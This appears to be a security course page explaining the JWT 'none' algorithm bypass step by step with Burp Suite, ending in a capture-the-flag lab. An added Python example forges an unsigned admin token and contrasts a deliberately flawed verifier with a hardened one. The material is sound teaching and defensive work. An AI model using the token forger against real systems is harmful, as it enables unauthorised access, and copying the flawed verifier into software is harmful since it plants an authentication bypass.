"None" Algorithm
One of the algorithms defined for JWT signatures is "none", meaning no signature at all: the token still has its three dot-separated parts, but the third (signature) part is empty, so the token ends in a trailing dot. If an application accepts such tokens, even though the developer never considered the possibility, anyone can edit the claims and the application will trust them, which is catastrophic. The specification spells the value in lowercase ("none"), but many vulnerable implementations compared it case-insensitively, so variants such as "None" or "NONE" are worth trying as well.
Step 1 - Obtain Token
Obtain the JWT token that the application gives you. You can see this in Burp's HTTP history when you invoke functions of the application that include the token.
Step 2 - Send HTTP request to Repeater
Send an HTTP request containing the token to Repeater so that you can resend it repeatedly, modifying the token each time, and see when the application accepts a modified token, which indicates a successful attack.
Step 3 - Edit token
Decode the token, change the algorithm (alg) value in its JOSE header to "None" (or another spelling such as "none"), edit the payload claims as needed, leave the signature part empty, and reassemble the token. You can do this in a couple of different ways; one option is Hakatemia's JWT Studio (Tools -> JWT Studio):
The second option is to use Burp Suite's "JSON Web Tokens" extension:
Step 4 - Victory
Once you have assembled the new JWT, replace the token originally present in the HTTP request with it and resend the request. If the response matches what the original token produced (or grants more than it did), the application accepted the unsigned token.
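The whole procedure above, done by hand instead of with JWT Studio or the Burp extension, as an added example that is not part of the original Hakatemia page: a constructed HS256 token is decoded, its alg set to "None", the admin claim flipped, and the token reassembled with an empty signature. The two verifiers are toy models written here for illustration (the server secret, the claims and the verifier code are all assumptions, not taken from the lab); the vulnerable one trusts the header's alg the way a broken application would, the hardened one pins the algorithm server-side.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed example secret; in the real attack you never need it,
# it exists here only so the "application" can issue a legitimate token.
SERVER_SECRET = b"example-server-secret"


def b64url_encode(data: bytes) -> str:
    """Base64url without '=' padding, as JWS requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Base64url decode, restoring the padding the token omits."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def issue_hs256(claims: dict, secret: bytes) -> str:
    """Step 1 stand-in: what the application's login endpoint would hand you."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def forge_none(token: str, alg_value: str = "none", **new_claims) -> str:
    """Step 3: decode, set alg to a 'none' spelling, edit claims, reassemble with an empty signature."""
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    header["alg"] = alg_value
    payload.update(new_claims)
    return (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
        + "."  # third segment deliberately left empty: no signature at all
    )


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Toy verifier that lets the token choose its own algorithm. Returns claims if accepted, else None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    alg = header.get("alg", "")
    if alg.lower() == "none":  # the flaw: an unsigned token is accepted as valid
        return json.loads(b64url_decode(payload_b64))
    if alg == "HS256":
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None


def verify_hardened(token: str, secret: bytes) -> Optional[dict]:
    """Fix: the server fixes the algorithm; the header's alg is only checked for agreement."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # every spelling of "none" ends up here and is rejected
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    legit = issue_hs256({"sub": "alice", "admin": False}, SERVER_SECRET)
    forged = forge_none(legit, "None", admin=True)
    print("forged token:       ", forged)
    print("vulnerable verifier:", verify_vulnerable(forged, SERVER_SECRET))
    print("hardened verifier:  ", verify_hardened(forged, SERVER_SECRET))
```

Paste the token that `forge_none` prints into Repeater in place of the original one (Step 4). Note that the forged token ends in a dot: if a tool strips it, the request may fail for the wrong reason, so check the raw request before concluding the application is not vulnerable.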
JWT Verification Bypass - 'None' Algorithm
In this lab, you will be able to perform your first JWT attack. The goal is to log in to the application as a regular user and obtain a token that has the "admin" claim value set to false. Then, using the techniques you have learned in this module, modify the token so that the "admin" claim value is true. Finally, read the flag from the /api/v1/flag endpoint.
Objective
Read the flag from the /api/v1/flag endpoint.
Exercises
Flag
Find the flag from the lab environment and enter it below.